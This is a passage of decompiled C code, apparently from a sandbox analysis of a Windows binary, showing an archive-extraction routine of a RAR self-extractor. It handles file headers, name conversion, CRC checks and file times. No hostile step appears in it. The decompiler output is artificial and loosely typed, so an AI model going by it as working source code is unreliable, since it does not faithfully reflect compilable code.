                                                                                                                                                      				char _v7228;
                                                                                                                                                      				char _v8392;
                                                                                                                                                      				char _v8396;
                                                                                                                                                      				char _v11484;
                                                                                                                                                      				void* __ebx;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				intOrPtr _t404;
                                                                                                                                                      				signed int _t414;
                                                                                                                                                      				signed int _t421;
                                                                                                                                                      				signed int _t424;
                                                                                                                                                      				signed int _t431;
                                                                                                                                                      				signed int _t437;
                                                                                                                                                      				char* _t441;
                                                                                                                                                      				char _t445;
                                                                                                                                                      				signed char _t450;
                                                                                                                                                      				signed int _t452;
                                                                                                                                                      				signed int _t456;
                                                                                                                                                      				signed int _t467;
                                                                                                                                                      				signed int _t471;
                                                                                                                                                      				signed int _t474;
                                                                                                                                                      				signed int _t491;
                                                                                                                                                      				intOrPtr _t501;
                                                                                                                                                      				signed int _t511;
                                                                                                                                                      				signed int _t512;
                                                                                                                                                      				signed int _t520;
                                                                                                                                                      				signed int _t523;
                                                                                                                                                      				signed int _t524;
                                                                                                                                                      				char _t527;
                                                                                                                                                      				signed int _t531;
                                                                                                                                                      				signed int _t541;
                                                                                                                                                      				signed int _t558;
                                                                                                                                                      				signed int _t559;
                                                                                                                                                      				signed int _t562;
                                                                                                                                                      				signed int _t570;
                                                                                                                                                      				signed int _t580;
                                                                                                                                                      				short* _t582;
                                                                                                                                                      				char* _t587;
                                                                                                                                                      				signed int _t591;
                                                                                                                                                      				short _t592;
                                                                                                                                                      				signed int _t597;
                                                                                                                                                      				signed int _t600;
                                                                                                                                                      				char* _t602;
                                                                                                                                                      				signed int _t604;
                                                                                                                                                      				signed int _t609;
                                                                                                                                                      				void* _t612;
                                                                                                                                                      				signed int _t621;
                                                                                                                                                      				signed int _t623;
                                                                                                                                                      				signed int _t627;
                                                                                                                                                      				intOrPtr _t628;
                                                                                                                                                      				signed int _t630;
                                                                                                                                                      				signed int _t634;
                                                                                                                                                      				intOrPtr _t640;
                                                                                                                                                      				char _t641;
                                                                                                                                                      				signed int _t653;
                                                                                                                                                      				void* _t706;
                                                                                                                                                      				signed int _t714;
                                                                                                                                                      				void* _t715;
                                                                                                                                                      				char* _t716;
                                                                                                                                                      				void* _t718;
                                                                                                                                                      
                                                                                                                                                      				_t706 = __edx;
                                                                                                                                                      				E00401200(0x2cd8);
                                                                                                                                                      				_t640 = _a4;
                                                                                                                                                      				_t716 = _a8;
                                                                                                                                                      				_t715 = __ecx;
                                                                                                                                                      				_v20 =  *((intOrPtr*)(_t640 + 0x329b));
                                                                                                                                                      				if(_a12 != 0) {
                                                                                                                                                      					L5:
                                                                                                                                                      					_t404 =  *((intOrPtr*)(_t716 + 0x4678));
                                                                                                                                                      					_a4 = _t404;
                                                                                                                                                      					__eflags = _t404 - 0x74;
                                                                                                                                                      					if(_t404 == 0x74) {
                                                                                                                                                      						__eflags =  *((char*)(_t715 + 0x1ddf));
                                                                                                                                                      						 *((char*)(_t715 + 0x11dd)) = 0;
                                                                                                                                                      						if( *((char*)(_t715 + 0x1ddf)) != 0) {
                                                                                                                                                      							L202:
                                                                                                                                                      							return 0;
                                                                                                                                                      						}
                                                                                                                                                      						__eflags =  *(_t640 + 0x28cc);
                                                                                                                                                      						if( *(_t640 + 0x28cc) != 0) {
                                                                                                                                                      							L24:
                                                                                                                                                      							OemToCharA(_t716 + 0x46d8, _t716 + 0x46d8);
                                                                                                                                                      							E0040A477( &_v1052, _t716 + 0x46d8);
                                                                                                                                                      							_v6204 = 0;
                                                                                                                                                      							_v21 = 0;
                                                                                                                                                      							_t414 = E00402AEE(_t640, _t716 + 0x46a8,  &_v21, 4); // executed
                                                                                                                                                      							__eflags = _t414;
                                                                                                                                                      							_a15 = _t414 != 0;
                                                                                                                                                      							__eflags = _a15;
                                                                                                                                                      							if(_a15 != 0) {
                                                                                                                                                      								__eflags = _v21;
                                                                                                                                                      								if(_v21 == 0) {
                                                                                                                                                      									 *((char*)(_t715 + 0x559)) = 0;
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      							__eflags =  *(_t716 + 0x46b0) & 0x00000200;
                                                                                                                                                      							if(( *(_t716 + 0x46b0) & 0x00000200) == 0) {
                                                                                                                                                      								L29:
                                                                                                                                                      								_v5 = 0;
                                                                                                                                                      								L30:
                                                                                                                                                      								asm("sbb eax, eax");
                                                                                                                                                      								_t644 = _t715 + 0x15de;
                                                                                                                                                      								__eflags = _v5;
                                                                                                                                                      								_v16 =  ~(_v5 & 0x000000ff) & _t715 + 0x000015de;
                                                                                                                                                      								if(_v5 != 0) {
                                                                                                                                                      									E00407589(_t716, _t716 + 0x4ad8,  &_v6204);
                                                                                                                                                      									_t621 = E0040E115(_t644,  &_v6204,  &_v7228, 0x1000000);
                                                                                                                                                      									__eflags = _t621;
                                                                                                                                                      									if(_t621 != 0) {
                                                                                                                                                      										_t623 = E0040793A( &_v7228);
                                                                                                                                                      										__eflags = _t623;
                                                                                                                                                      										if(_t623 != 0) {
                                                                                                                                                      											E0040A477( &_v1052,  &_v7228);
                                                                                                                                                      										}
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      								E0040748A(_t715,  &_v1052,  &_v1052);
                                                                                                                                                      								_t421 = E00401BE7(_t716);
                                                                                                                                                      								__eflags = _t421;
                                                                                                                                                      								if(_t421 != 0) {
                                                                                                                                                      									L19:
                                                                                                                                                      									return 1;
                                                                                                                                                      								}
                                                                                                                                                      								__eflags =  *(_t716 + 0x46b0) & 0x00000800;
                                                                                                                                                      								if(( *(_t716 + 0x46b0) & 0x00000800) == 0) {
                                                                                                                                                      									_t424 = E00401BD5(_t716);
                                                                                                                                                      									__eflags = _t424;
                                                                                                                                                      									if(_t424 != 0) {
                                                                                                                                                      										L45:
                                                                                                                                                      										E00401C00(_t716);
                                                                                                                                                      										 *(_t715 + 0x4ee) =  *(_t716 + 0x46b0) >> 0x00000001 & 0x00000001;
                                                                                                                                                      										 *((char*)(_t715 + 0x4ef)) = 0;
                                                                                                                                                      										asm("sbb ecx, [esi+0x5384]");
                                                                                                                                                      										_t649 = _t716;
                                                                                                                                                      										_t431 = E004054ED(_t716,  *((intOrPtr*)(_t716 + 0x6d80)) -  *(_t716 + 0x5380),  *((intOrPtr*)(_t716 + 0x6d84)), 0);
                                                                                                                                                      										__eflags = _a15;
                                                                                                                                                      										_a11 = 0;
                                                                                                                                                      										_a7 = 0;
                                                                                                                                                      										_v25 = 0;
                                                                                                                                                      										if(_a15 != 0) {
                                                                                                                                                      											L47:
                                                                                                                                                      											__eflags = _v20 - 0x49;
                                                                                                                                                      											_push(_v25);
                                                                                                                                                      											_push((_t431 & 0xffffff00 | _v20 == 0x00000049) & 0x000000ff);
                                                                                                                                                      											_push( *(_t640 + 0x29ba) & 0x000000ff);
                                                                                                                                                      											_t437 = E0040BB56(_t649,  &_v1052,  &_v6204);
                                                                                                                                                      											__eflags = _t437;
                                                                                                                                                      											if(_t437 == 0) {
                                                                                                                                                      												goto L202;
                                                                                                                                                      											}
                                                                                                                                                      											__eflags =  *(_t716 + 0x46b0) & 0x00000004;
                                                                                                                                                      											if(( *(_t716 + 0x46b0) & 0x00000004) == 0) {
                                                                                                                                                      												L52:
                                                                                                                                                      												_v12 = _t715 + 0x11de;
                                                                                                                                                      												E0040A477(_t715 + 0x11de, _t640 + 0x810);
                                                                                                                                                      												__eflags =  *((intOrPtr*)(_t640 + 0x28c8)) - 5;
                                                                                                                                                      												if( *((intOrPtr*)(_t640 + 0x28c8)) != 5) {
                                                                                                                                                      													L59:
                                                                                                                                                      													_a7 = 0;
                                                                                                                                                      													L56:
                                                                                                                                                      													__eflags = _v20 - 0x45;
                                                                                                                                                      													if(_v20 == 0x45) {
                                                                                                                                                      														L60:
                                                                                                                                                      														_t441 = E004073DB( &_v1052);
                                                                                                                                                      														L61:
                                                                                                                                                      														E0040A5E2(_v12, _t441);
                                                                                                                                                      														_t445 = E0040DA9A( *_v12 & 0x000000ff);
                                                                                                                                                      														__eflags = _a7;
                                                                                                                                                      														_v26 = _t445;
                                                                                                                                                      														if(_a7 != 0) {
                                                                                                                                                      															__eflags =  *((char*)(_t715 + 0x11df)) - 0x5f;
                                                                                                                                                      															if( *((char*)(_t715 + 0x11df)) == 0x5f) {
                                                                                                                                                      																_t597 = E004072B6( *((char*)(_t715 + 0x11e0)));
                                                                                                                                                      																__eflags = _t597;
                                                                                                                                                      																if(_t597 != 0) {
                                                                                                                                                      																	__eflags = _v26 - 0x41 - 0x19;
                                                                                                                                                      																	if(_v26 - 0x41 <= 0x19) {
                                                                                                                                                      																		 *((char*)(_t715 + 0x11df)) = 0x3a;
                                                                                                                                                      																	}
                                                                                                                                                      																}
                                                                                                                                                      															}
                                                                                                                                                      														}
                                                                                                                                                      														__eflags = _v5;
                                                                                                                                                      														if(_v5 == 0) {
                                                                                                                                                      															__eflags = 0;
                                                                                                                                                      															 *(_t715 + 0x15de) = 0;
                                                                                                                                                      															L81:
                                                                                                                                                      															__eflags = _v25;
                                                                                                                                                      															if(_v25 != 0) {
                                                                                                                                                      																L83:
                                                                                                                                                      																_a7 = 0;
                                                                                                                                                      																L84:
                                                                                                                                                      																__eflags =  *((char*)(_t640 + 0x28c4));
                                                                                                                                                      																if( *((char*)(_t640 + 0x28c4)) != 0) {
                                                                                                                                                      																	L86:
                                                                                                                                                      																	__eflags = _v20 - 0x45;
                                                                                                                                                      																	if(_v20 == 0x45) {
                                                                                                                                                      																		L88:
                                                                                                                                                      																		E00403556( &_v11484);
                                                                                                                                                      																		_push(0);
                                                                                                                                                      																		__eflags = E00406045( &_v11484, _t706, _v12, _v16,  &_v11484);
                                                                                                                                                      																		if(__eflags == 0) {
                                                                                                                                                      																			__eflags =  *((char*)(_t640 + 0x28c4));
                                                                                                                                                      																			L93:
                                                                                                                                                      																			if(__eflags == 0) {
                                                                                                                                                      																				L95:
                                                                                                                                                      																				__eflags =  *(_t716 + 0x46b0) & 0x00000004;
                                                                                                                                                      																				if(( *(_t716 + 0x46b0) & 0x00000004) != 0) {
                                                                                                                                                      																					__eflags =  *((char*)(_t715 + 0x115c));
                                                                                                                                                      																					if( *((char*)(_t715 + 0x115c)) == 0) {
                                                                                                                                                      																						E0040325C(0x414c7c, 1);
                                                                                                                                                      																						_a7 = 0;
                                                                                                                                                      																					}
                                                                                                                                                      																				}
                                                                                                                                                      																				_t450 =  *(_t716 + 0x46c8);
                                                                                                                                                      																				__eflags = _t450 - 0x24;
                                                                                                                                                      																				if(_t450 != 0x24) {
                                                                                                                                                      																					__eflags = _t450 - 0x1d;
                                                                                                                                                      																					if(_t450 != 0x1d) {
                                                                                                                                                      																						__eflags =  *((char*)(_t716 + 0x46c9)) - 0x30;
                                                                                                                                                      																						if( *((char*)(_t716 + 0x46c9)) != 0x30) {
                                                                                                                                                      																							E0040B2A9(_t716 + 0x17, E004098F7(0x6c),  &_v1052);
                                                                                                                                                      																							_t718 = _t718 + 0xc;
                                                                                                                                                      																							_a7 = 0;
                                                                                                                                                      																							E0040325C(0x414c7c, 1);
                                                                                                                                                      																						}
                                                                                                                                                      																					}
                                                                                                                                                      																				}
                                                                                                                                                      																				_t652 =  &_v4156;
                                                                                                                                                      																				E00404EC3( &_v4156);
                                                                                                                                                      																				_push( *(_t716 + 0x46cc));
                                                                                                                                                      																				_t452 = E004057B6();
                                                                                                                                                      																				__eflags = _t452;
                                                                                                                                                      																				if(_t452 != 0) {
                                                                                                                                                      																					L138:
                                                                                                                                                      																					__eflags = _a7;
                                                                                                                                                      																					if(_a7 != 0) {
                                                                                                                                                      																						goto L143;
                                                                                                                                                      																					}
                                                                                                                                                      																					goto L139;
                                                                                                                                                      																				} else {
                                                                                                                                                      																					_t652 = _t716;
                                                                                                                                                      																					_t523 = E00401BD5(_t716);
                                                                                                                                                      																					__eflags = _t523;
                                                                                                                                                      																					if(_t523 == 0) {
                                                                                                                                                      																						_t524 =  *(_t640 + 0x29ba);
                                                                                                                                                      																						__eflags = _t524;
                                                                                                                                                      																						if(_t524 != 0) {
                                                                                                                                                      																							__eflags = _a7;
                                                                                                                                                      																							if(_a7 != 0) {
                                                                                                                                                      																								_a11 = 1;
                                                                                                                                                      																							}
                                                                                                                                                      																						}
                                                                                                                                                      																						__eflags = _v20 - 0x45;
                                                                                                                                                      																						if(_v20 == 0x45) {
                                                                                                                                                      																							L130:
                                                                                                                                                      																							__eflags = _a7;
                                                                                                                                                      																							if(_a7 == 0) {
                                                                                                                                                      																								L139:
                                                                                                                                                      																								__eflags =  *((char*)(_t716 + 0x6d89));
                                                                                                                                                      																								if( *((char*)(_t716 + 0x6d89)) == 0) {
                                                                                                                                                      																									__eflags = _a7;
                                                                                                                                                      																									if(_a7 == 0) {
                                                                                                                                                      																										L195:
                                                                                                                                                      																										E00405074(_t640,  &_v4156);
                                                                                                                                                      																										__eflags = _a15;
                                                                                                                                                      																										if(_a15 != 0) {
                                                                                                                                                      																											_t394 = _t715 + 0x554;
                                                                                                                                                      																											 *_t394 =  *(_t715 + 0x554) + 1;
                                                                                                                                                      																											__eflags =  *_t394;
                                                                                                                                                      																										}
                                                                                                                                                      																										L197:
                                                                                                                                                      																										__eflags =  *((char*)(_t715 + 0x4ef));
                                                                                                                                                      																										if( *((char*)(_t715 + 0x4ef)) != 0) {
                                                                                                                                                      																											goto L202;
                                                                                                                                                      																										}
                                                                                                                                                      																										__eflags =  *((intOrPtr*)(_t716 + 4)) - 0xffffffff;
                                                                                                                                                      																										if( *((intOrPtr*)(_t716 + 4)) == 0xffffffff) {
                                                                                                                                                      																											goto L202;
                                                                                                                                                      																										}
                                                                                                                                                      																										__eflags = _a7;
                                                                                                                                                      																										if(_a7 != 0) {
                                                                                                                                                      																											goto L19;
                                                                                                                                                      																										}
                                                                                                                                                      																										__eflags =  *((char*)(_t716 + 0x6d89));
                                                                                                                                                      																										if( *((char*)(_t716 + 0x6d89)) == 0) {
                                                                                                                                                      																											L18:
                                                                                                                                                      																											E00401264(_t716);
                                                                                                                                                      																											goto L19;
                                                                                                                                                      																										}
                                                                                                                                                      																										__eflags = _v25;
                                                                                                                                                      																										if(_v25 != 0) {
                                                                                                                                                      																											goto L19;
                                                                                                                                                      																										}
                                                                                                                                                      																										goto L202;
                                                                                                                                                      																									}
                                                                                                                                                      																									L143:
                                                                                                                                                      																									__eflags = _v25;
                                                                                                                                                      																									if(_v25 == 0) {
                                                                                                                                                      																										__eflags = _a11;
                                                                                                                                                      																										if(_a11 == 0) {
                                                                                                                                                      																											__eflags = _v20 - 0x50;
                                                                                                                                                      																											if(_v20 != 0x50) {
                                                                                                                                                      																												_t512 = E00405051( &_v4156);
                                                                                                                                                      																												__eflags = _t512;
                                                                                                                                                      																												if(_t512 != 0) {
                                                                                                                                                      																													E0040B2A9(_t716 + 0x17, E004098F7(0x406), _v12);
                                                                                                                                                      																													_t718 = _t718 + 0xc;
                                                                                                                                                      																													E00403471(0x414c7c, _t716 + 0x17, _v12);
                                                                                                                                                      																												}
                                                                                                                                                      																											}
                                                                                                                                                      																										}
                                                                                                                                                      																										_t273 = _t715 + 0x54c;
                                                                                                                                                      																										 *_t273 =  *(_t715 + 0x54c) + 1;
                                                                                                                                                      																										__eflags =  *_t273;
                                                                                                                                                      																									}
                                                                                                                                                      																									L149:
                                                                                                                                                      																									 *((intOrPtr*)(_t715 + 0x550)) =  *((intOrPtr*)(_t715 + 0x550)) + 1;
                                                                                                                                                      																									_t653 = 0;
                                                                                                                                                      																									 *((intOrPtr*)(_t715 + 0x510)) = 0;
                                                                                                                                                      																									 *((intOrPtr*)(_t715 + 0x514)) = 0;
                                                                                                                                                      																									 *((intOrPtr*)(_t715 + 0x518)) = 0;
                                                                                                                                                      																									 *((intOrPtr*)(_t715 + 0x51c)) = 0;
                                                                                                                                                      																									__eflags =  *(_t716 + 0x6d88);
                                                                                                                                                      																									 *(_t715 + 0x538) =  *(_t715 + 0x538) | 0xffffffff;
                                                                                                                                                      																									 *((intOrPtr*)(_t715 + 0x534)) = (0 |  *(_t716 + 0x6d88) != 0x00000000) - 1;
                                                                                                                                                      																									_t456 =  *(_t716 + 0x46b0) & 0x0000ffff;
                                                                                                                                                      																									__eflags = _t456 & 0x00000004;
                                                                                                                                                      																									if((_t456 & 0x00000004) != 0) {
                                                                                                                                                      																										_t653 =  *(_t716 + 0x46c8) & 0x000000ff;
                                                                                                                                                      																									}
                                                                                                                                                      																									__eflags =  *(_t716 + 0x46c8) - 0x24;
                                                                                                                                                      																									asm("sbb dl, dl");
                                                                                                                                                      																									asm("sbb eax, eax");
                                                                                                                                                      																									E00409013(_t715 + 0x28, _t653, _t715 + 0x115c,  ~(_t456 & 0x400) & _t716 + 0x000052e4, 0, _t706 + 0x00000001 & 0x000000ff);
                                                                                                                                                      																									 *(_t715 + 0x48) =  *(_t716 + 0x5380);
                                                                                                                                                      																									 *(_t715 + 0x4c) =  *(_t716 + 0x5384);
                                                                                                                                                      																									E00408FF3(_t715 + 0x28, _t716,  &_v4156);
                                                                                                                                                      																									_t467 = _a11;
                                                                                                                                                      																									 *(_t715 + 0x51) = _t467;
                                                                                                                                                      																									 *((char*)(_t715 + 0x52)) = _v25;
                                                                                                                                                      																									__eflags = _t467;
                                                                                                                                                      																									if(_t467 != 0) {
                                                                                                                                                      																										L163:
                                                                                                                                                      																										 *(_t640 + 0x2900) =  *(_t640 + 0x29ba);
                                                                                                                                                      																										_v4137 = _t467 & 0xffffff00 |  *(_t640 + 0x2900) == 0x00000000;
                                                                                                                                                      																										if( *(_t640 + 0x29ba) != 0) {
                                                                                                                                                      																											L165:
                                                                                                                                                      																											_v16 = 0;
                                                                                                                                                      																											L166:
                                                                                                                                                      																											_push(_v16);
                                                                                                                                                      																											_push(_t715 + 0x534);
                                                                                                                                                      																											_push(_v12);
                                                                                                                                                      																											_push(_t716);
                                                                                                                                                      																											_push(_t715 + 0x28);
                                                                                                                                                      																											_t471 = E0040E110();
                                                                                                                                                      																											__eflags = _t471;
                                                                                                                                                      																											if(_t471 == 0) {
                                                                                                                                                      																												__eflags =  *(_t716 + 0x46b0) & 0x00000001;
                                                                                                                                                      																												if(( *(_t716 + 0x46b0) & 0x00000001) == 0) {
                                                                                                                                                      																													__eflags =  *((char*)(_t716 + 0x46c9)) - 0x30;
                                                                                                                                                      																													if( *((char*)(_t716 + 0x46c9)) != 0x30) {
                                                                                                                                                      																														_t501 =  *((intOrPtr*)(_t715 + 0x548));
                                                                                                                                                      																														 *((intOrPtr*)(_t501 + 0x5760)) =  *((intOrPtr*)(_t716 + 0x5388));
                                                                                                                                                      																														 *(_t501 + 0x5764) =  *(_t716 + 0x538c);
                                                                                                                                                      																														 *((char*)(_t501 + 0x5778)) = 0;
                                                                                                                                                      																														__eflags =  *(_t716 + 0x46b0) >> 0x00000004 & 0x00000001;
                                                                                                                                                      																														E00411244( *(_t716 + 0x46c8) & 0x000000ff,  *(_t716 + 0x46b0) >> 0x00000004 & 1);
                                                                                                                                                      																													} else {
                                                                                                                                                      																														E004039B3(_t640, _t715 + 0x28,  *((intOrPtr*)(_t716 + 0x5388)),  *(_t716 + 0x538c));
                                                                                                                                                      																													}
                                                                                                                                                      																												}
                                                                                                                                                      																											} else {
                                                                                                                                                      																												 *((char*)(_t715 + 0x11dd)) = _v16;
                                                                                                                                                      																											}
                                                                                                                                                      																											__eflags =  *((intOrPtr*)(_t716 + 4)) - 0xffffffff;
                                                                                                                                                      																											if( *((intOrPtr*)(_t716 + 4)) != 0xffffffff) {
                                                                                                                                                      																												E00401264(_t716);
                                                                                                                                                      																											}
                                                                                                                                                      																											__eflags = _v25;
                                                                                                                                                      																											_v5 = 0;
                                                                                                                                                      																											if(_v25 != 0) {
                                                                                                                                                      																												L183:
                                                                                                                                                      																												__eflags = _a11;
                                                                                                                                                      																												if(_a11 != 0) {
                                                                                                                                                      																													goto L195;
                                                                                                                                                      																												}
                                                                                                                                                      																												__eflags = _v20 - 0x58;
                                                                                                                                                      																												if(_v20 == 0x58) {
                                                                                                                                                      																													L186:
                                                                                                                                                      																													_push( *(_t716 + 0x46cc));
                                                                                                                                                      																													_t474 = E004057B6();
                                                                                                                                                      																													__eflags = _t474;
                                                                                                                                                      																													if(_t474 != 0) {
                                                                                                                                                      																														goto L195;
                                                                                                                                                      																													}
                                                                                                                                                      																													__eflags =  *((intOrPtr*)(_t640 + 0x28c0)) - _t474;
                                                                                                                                                      																													if( *((intOrPtr*)(_t640 + 0x28c0)) != _t474) {
                                                                                                                                                      																														_t369 = _t716 + 0x46cc;
                                                                                                                                                      																														 *_t369 =  *(_t716 + 0x46cc) & 0xffffffdf;
                                                                                                                                                      																														__eflags =  *_t369;
                                                                                                                                                      																													}
                                                                                                                                                      																													__eflags = _v5;
                                                                                                                                                      																													if(_v5 == 0) {
                                                                                                                                                      																														L192:
                                                                                                                                                      																														asm("sbb edx, edx");
                                                                                                                                                      																														asm("sbb eax, eax");
                                                                                                                                                      																														asm("sbb eax, eax");
                                                                                                                                                      																														E004053C5( &_v4156,  ~( *(_t640 + 0x2e84)) & _t716 + 0x000052ec,  ~( *(_t640 + 0x2e88)) & _t716 + 0x00005310,  ~( *(_t640 + 0x2e8c)) & _t716 + 0x00005334); // executed
                                                                                                                                                      																														E00404F2E( &_v4156);
                                                                                                                                                      																														asm("sbb ecx, ecx");
                                                                                                                                                      																														asm("sbb ecx, ecx");
                                                                                                                                                      																														E0040504E(_t716 + 0x52ec,  ~( *(_t640 + 0x2e84)) & _t716 + 0x000052ec,  ~( *(_t640 + 0x2e8c)) & _t716 + 0x00005334);
                                                                                                                                                      																														__eflags =  *((char*)(_t640 + 0x2959));
                                                                                                                                                      																														if(__eflags == 0) {
                                                                                                                                                      																															E004057E8(__eflags,  &_v4133,  &_v3108,  *(_t716 + 0x46cc));
                                                                                                                                                      																														}
                                                                                                                                                      																														 *((char*)(_t715 + 0x11dd)) = 1;
                                                                                                                                                      																														goto L195;
                                                                                                                                                      																													} else {
                                                                                                                                                      																														__eflags =  *(_t640 + 0x2900);
                                                                                                                                                      																														if( *(_t640 + 0x2900) == 0) {
                                                                                                                                                      																															goto L195;
                                                                                                                                                      																														}
                                                                                                                                                      																														E0040503E( &_v4156);
                                                                                                                                                      																														goto L192;
                                                                                                                                                      																													}
                                                                                                                                                      																												}
                                                                                                                                                      																												__eflags = _v20 - 0x45;
                                                                                                                                                      																												if(_v20 != 0x45) {
                                                                                                                                                      																													goto L195;
                                                                                                                                                      																												}
                                                                                                                                                      																												goto L186;
                                                                                                                                                      																											} else {
                                                                                                                                                      																												_t491 =  *(_t716 + 0x6d88);
                                                                                                                                                      																												__eflags = _t491;
                                                                                                                                                      																												if(_t491 == 0) {
                                                                                                                                                      																													L178:
                                                                                                                                                      																													__eflags =  *((intOrPtr*)(_t715 + 0x534)) -  !( *(_t716 + 0x46c0));
                                                                                                                                                      																													if( *((intOrPtr*)(_t715 + 0x534)) ==  !( *(_t716 + 0x46c0))) {
                                                                                                                                                      																														goto L183;
                                                                                                                                                      																													}
                                                                                                                                                      																													L179:
                                                                                                                                                      																													__eflags =  *(_t716 + 0x46b0) & 0x00000004;
                                                                                                                                                      																													_push( &_v1052);
                                                                                                                                                      																													if(( *(_t716 + 0x46b0) & 0x00000004) == 0) {
                                                                                                                                                      																														_push(0x71);
                                                                                                                                                      																													} else {
                                                                                                                                                      																														_push(0x70);
                                                                                                                                                      																													}
                                                                                                                                                      																													E004098F7();
                                                                                                                                                      																													_push(_t716 + 0x17);
                                                                                                                                                      																													E0040B2A9();
                                                                                                                                                      																													_v5 = 1;
                                                                                                                                                      																													E00402C95(E0040325C(0x414c7c, 3));
                                                                                                                                                      																													goto L183;
                                                                                                                                                      																												}
                                                                                                                                                      																												__eflags =  *((intOrPtr*)(_t715 + 0x534)) -  *(_t716 + 0x46c0);
                                                                                                                                                      																												if( *((intOrPtr*)(_t715 + 0x534)) ==  *(_t716 + 0x46c0)) {
                                                                                                                                                      																													goto L183;
                                                                                                                                                      																												}
                                                                                                                                                      																												__eflags = _t491;
                                                                                                                                                      																												if(_t491 != 0) {
                                                                                                                                                      																													goto L179;
                                                                                                                                                      																												}
                                                                                                                                                      																												goto L178;
                                                                                                                                                      																											}
                                                                                                                                                      																										}
                                                                                                                                                      																										__eflags = _v25;
                                                                                                                                                      																										_v16 = 1;
                                                                                                                                                      																										if(_v25 == 0) {
                                                                                                                                                      																											goto L166;
                                                                                                                                                      																										}
                                                                                                                                                      																										goto L165;
                                                                                                                                                      																									} else {
                                                                                                                                                      																										__eflags =  *((intOrPtr*)(_t716 + 0x6d98)) - _t467;
                                                                                                                                                      																										if( *((intOrPtr*)(_t716 + 0x6d98)) != _t467) {
                                                                                                                                                      																											goto L163;
                                                                                                                                                      																										}
                                                                                                                                                      																										_t511 =  *(_t716 + 0x5380);
                                                                                                                                                      																										_t714 =  *(_t716 + 0x538c);
                                                                                                                                                      																										_t467 = _t511 << 0xb;
                                                                                                                                                      																										__eflags = ( *(_t716 + 0x5384) << 0x00000020 | _t511) << 0xb - _t714;
                                                                                                                                                      																										if(__eflags < 0) {
                                                                                                                                                      																											goto L163;
                                                                                                                                                      																										}
                                                                                                                                                      																										if(__eflags > 0) {
                                                                                                                                                      																											L156:
                                                                                                                                                      																											__eflags = _t714;
                                                                                                                                                      																											if(__eflags < 0) {
                                                                                                                                                      																												L162:
                                                                                                                                                      																												_t467 = E0040551C( &_v4156,  *((intOrPtr*)(_t716 + 0x5388)),  *(_t716 + 0x538c));
                                                                                                                                                      																												goto L163;
                                                                                                                                                      																											}
                                                                                                                                                      																											if(__eflags > 0) {
                                                                                                                                                      																												L159:
                                                                                                                                                      																												_t467 = E0040554A(_t716, _t714, __eflags);
                                                                                                                                                      																												__eflags = _t714 -  *(_t716 + 0x5384);
                                                                                                                                                      																												if(__eflags < 0) {
                                                                                                                                                      																													goto L163;
                                                                                                                                                      																												}
                                                                                                                                                      																												if(__eflags > 0) {
                                                                                                                                                      																													goto L162;
                                                                                                                                                      																												}
                                                                                                                                                      																												__eflags = _t467 -  *(_t716 + 0x5380);
                                                                                                                                                      																												if(_t467 <=  *(_t716 + 0x5380)) {
                                                                                                                                                      																													goto L163;
                                                                                                                                                      																												}
                                                                                                                                                      																												goto L162;
                                                                                                                                                      																											}
                                                                                                                                                      																											__eflags =  *((intOrPtr*)(_t716 + 0x5388)) - 0x5f5e100;
                                                                                                                                                      																											if(__eflags < 0) {
                                                                                                                                                      																												goto L162;
                                                                                                                                                      																											}
                                                                                                                                                      																											goto L159;
                                                                                                                                                      																										}
                                                                                                                                                      																										__eflags = _t467 -  *((intOrPtr*)(_t716 + 0x5388));
                                                                                                                                                      																										if(_t467 <=  *((intOrPtr*)(_t716 + 0x5388))) {
                                                                                                                                                      																											goto L163;
                                                                                                                                                      																										}
                                                                                                                                                      																										goto L156;
                                                                                                                                                      																									}
                                                                                                                                                      																								}
                                                                                                                                                      																								_push(1);
                                                                                                                                                      																								_push(0);
                                                                                                                                                      																								_push(0);
                                                                                                                                                      																								_v25 = 1;
                                                                                                                                                      																								_a11 = 1;
                                                                                                                                                      																								_a7 = 1;
                                                                                                                                                      																								_t520 = E0040BB56(_t652,  &_v1052,  &_v6204);
                                                                                                                                                      																								__eflags = _t520;
                                                                                                                                                      																								if(_t520 != 0) {
                                                                                                                                                      																									goto L149;
                                                                                                                                                      																								}
                                                                                                                                                      																								_t641 = 0;
                                                                                                                                                      																								L123:
                                                                                                                                                      																								E00405074(_t641,  &_v4156);
                                                                                                                                                      																								return _t641;
                                                                                                                                                      																							}
                                                                                                                                                      																							__eflags = _t524;
                                                                                                                                                      																							if(_t524 != 0) {
                                                                                                                                                      																								goto L138;
                                                                                                                                                      																							}
                                                                                                                                                      																							_t527 = E00404CF1(_t706, _t640,  &_v4156, _v12, _v16,  *((intOrPtr*)(_t640 + 0x28a4)),  &_v5,  *((intOrPtr*)(_t716 + 0x5388)),  *(_t716 + 0x538c),  *((intOrPtr*)(_t716 + 0x46c4))); // executed
                                                                                                                                                      																							__eflags = _t527;
                                                                                                                                                      																							if(_t527 != 0) {
                                                                                                                                                      																								goto L138;
                                                                                                                                                      																							}
                                                                                                                                                      																							_a7 = _t527;
                                                                                                                                                      																							__eflags = _v5 - _t527;
                                                                                                                                                      																							if(_v5 != _t527) {
                                                                                                                                                      																								goto L139;
                                                                                                                                                      																							}
                                                                                                                                                      																							E004033DB(_t716 + 0x17, _v12);
                                                                                                                                                      																							_t652 = 0x414c7c;
                                                                                                                                                      																							E0040325C(0x414c7c, 9);
                                                                                                                                                      																							_t531 = E0040793A(_v12);
                                                                                                                                                      																							__eflags = _t531;
                                                                                                                                                      																							if(_t531 != 0) {
                                                                                                                                                      																								goto L139;
                                                                                                                                                      																							}
                                                                                                                                                      																							_push(E004098F7(0x456));
                                                                                                                                                      																							_push(_t716 + 0x17);
                                                                                                                                                      																							E0040B2A9();
                                                                                                                                                      																							E0040DB30( &_v7228, _v12, 0x400);
                                                                                                                                                      																							E004079A3(_v12, 1);
                                                                                                                                                      																							E004058FF(_t640, _t716, _v12, 0, 1);
                                                                                                                                                      																							_t541 = E00404CF1(_t706, _t640,  &_v4156, _v12, 0,  *((intOrPtr*)(_t640 + 0x28a4)),  &_v5,  *((intOrPtr*)(_t716 + 0x5388)),  *(_t716 + 0x538c),  *((intOrPtr*)(_t716 + 0x46c4)));
                                                                                                                                                      																							__eflags = _t541;
                                                                                                                                                      																							if(_t541 == 0) {
                                                                                                                                                      																								_t652 = 0x414c7c;
                                                                                                                                                      																								E004033DB(_t716 + 0x17, _v12);
                                                                                                                                                      																								goto L138;
                                                                                                                                                      																							}
                                                                                                                                                      																							_a7 = 1;
                                                                                                                                                      																							goto L143;
